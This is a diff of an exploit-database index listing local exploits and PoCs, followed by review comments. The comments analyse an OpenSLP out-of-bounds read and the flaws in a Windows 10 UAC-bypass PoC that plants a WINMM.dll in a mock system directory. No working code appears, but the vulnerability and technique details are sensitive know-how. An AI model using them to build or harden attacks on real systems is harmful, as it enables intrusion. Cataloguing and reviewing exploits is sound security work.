@@ -10016,7 +10016,7 @@ id,file,description,date,author,type,platform,port 45205,exploits/linux/local/45205.txt,"WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData()' Buffer Overflow (PoC)",2018-08-16,PeregrineX,local,linux, 45235,exploits/windows_x86/local/45235.py,"Project64 2.3.2 - Buffer Overflow (SEH)",2018-08-22,"Shubham Singh",local,windows_x86, 45243,exploits/linux/local/45243.txt,"Ghostscript - Multiple Vulnerabilities",2018-08-22,"Google Security Research",local,linux, -45244,exploits/windows/local/45244.txt,"Windows 10 Diagnostics Hub Standard Collector Service - Privilege Escalation",2018-08-22,"Atredis Partners",local,windows, +45244,exploits/windows/local/45244.txt,"Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation",2018-08-22,"Atredis Partners",local,windows, 45250,exploits/windows_x86/local/45250.py,"StyleWriter 4 1.0 - Denial of Service (PoC)",2018-08-23,"Gionathan Reale",local,windows_x86, 45259,exploits/windows_x86/local/45259.py,"CuteFTP 5.0 - Buffer Overflow",2018-08-27,"Matteo Malvica",local,windows_x86, 45269,exploits/windows/local/45269.rb,"Foxit PDF Reader 9.0.1.1049 - Pointer Overwrite Use-After-Free (Metasploit)",2018-08-27,Metasploit,local,windows, 
@@ -10072,7 +10072,7 @@ id,file,description,date,author,type,platform,port 45626,exploits/windows/local/45626.rb,"VLC Media Player - MKV Use-After-Free (Metasploit)",2018-10-16,Metasploit,local,windows, 45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86, 45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux, -45653,exploits/windows/local/45653.rb,"Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows, +45653,exploits/windows/local/45653.rb,"Microsoft Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows, 45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows, 45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows, 45687,exploits/windows_x86/local/45687.txt,"Adult Filter 1.0 - Buffer Overflow (SEH)",2018-10-25,AkkuS,local,windows_x86, 
@@ -10089,6 +10089,8 @@ id,file,description,date,author,type,platform,port 45785,exploits/hardware/local/45785.md,"Intel (Skylake / Kaby Lake) - 'PortSmash' CPU SMT Side-Channel",2018-11-02,"Billy Brumley",local,hardware, 45796,exploits/windows_x86/local/45796.py,"Arm Whois 3.11 - Buffer Overflow (SEH)",2018-11-06,"Semen Alexandrovich Lyhin",local,windows_x86, 45798,exploits/linux/local/45798.txt,"libiec61850 1.3 - Stack Based Buffer Overflow",2018-11-06,"Dhiraj Mishra",local,linux, +45804,exploits/linux/local/45804.txt,"OpenSLP 2.0.0 - Multiple Vulnerabilities",2018-11-07,"Magnus Klaaborg Stubman",local,linux, +45805,exploits/windows/local/45805.cpp,"Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)",2018-11-08,"Tenable NS",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
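Review bot: the bug 1 analysis in exploits/linux/local/45804.txt misplaces the root cause. After GetStrPtr at line 322 advances buffer->curpos by scopelistlen, the check at line 323 only rejects `curpos > end`, so a packet that lands curpos exactly on buffer->end passes it, and the GetUINT16 at line 327 then reads from buffer->end, which is the "Invalid read of size 1 ... 0 bytes after a block of size 81" in the Valgrind report; that memory is past the end of the allocation, not "uninitialized" as the text says. The defensive fix this points to is to verify that at least 2 bytes remain before each GetUINT16 call rather than checking only afterwards. Smaller points in the same file: "memmove on line 2010" should read line 210 (the listing shows memmove at 210); the listing prints the function as slpfoldwhitespace while the trace names SLPFoldWhiteSpace, so the block appears to have been lowercased and should match the source; "occurence" should be "occurrence" and "havn't" should be "haven't"; and since the third memmove argument is a size_t, the wrapped value is near SIZE_MAX on a 64-bit build rather than UINT_MAX.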
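Review bot: the second `#include` in exploits/windows/local/45805.cpp has lost its header name (only `#include` survives, most likely an angle-bracket header stripped in transit), so the file will not compile as committed; restore the header before merging. DropResource also never checks FindResource, LoadResource or CreateFile for NULL / INVALID_HANDLE_VALUE, and main ignores the return values of CreateDirectoryW, CopyFileW and ShellExecuteEx, so a failure at any step silently leaves a partial `C:\Windows \` tree and a stray WINMM.dll behind. Checking each call and deleting the created directory and files on exit would make the PoC self-cleaning and make its failure modes visible to whoever reproduces it.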
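Review bot: the rename at id 44478 (hunk @@ -9907) changes "Microsoft Window Manager" to "Microsoft Windows Manager", which turns a component name into a typo: the exploit targets the menu management code of the Windows window manager, so "Window Manager" was the correct wording. If the goal is the "Microsoft Windows" prefix applied elsewhere in this commit, "Microsoft Windows 7 (x86) - Window Manager Menu Management Component UAF Privilege Elevation" would keep the meaning.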
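Review bot: the new 45804 entry is filed as type=local with an empty port, but the advisory it points to triggers both bugs with a UDP datagram to port 427 handled by slpd's IncomingDatagramRead, i.e. a network-reachable service, and the earlier OpenSLP entry 44972 touched in this same commit is filed as dos/linux. Consider filing 45804 under dos or remote with port 427 so the classification matches the advisory's content and the existing OpenSLP entry.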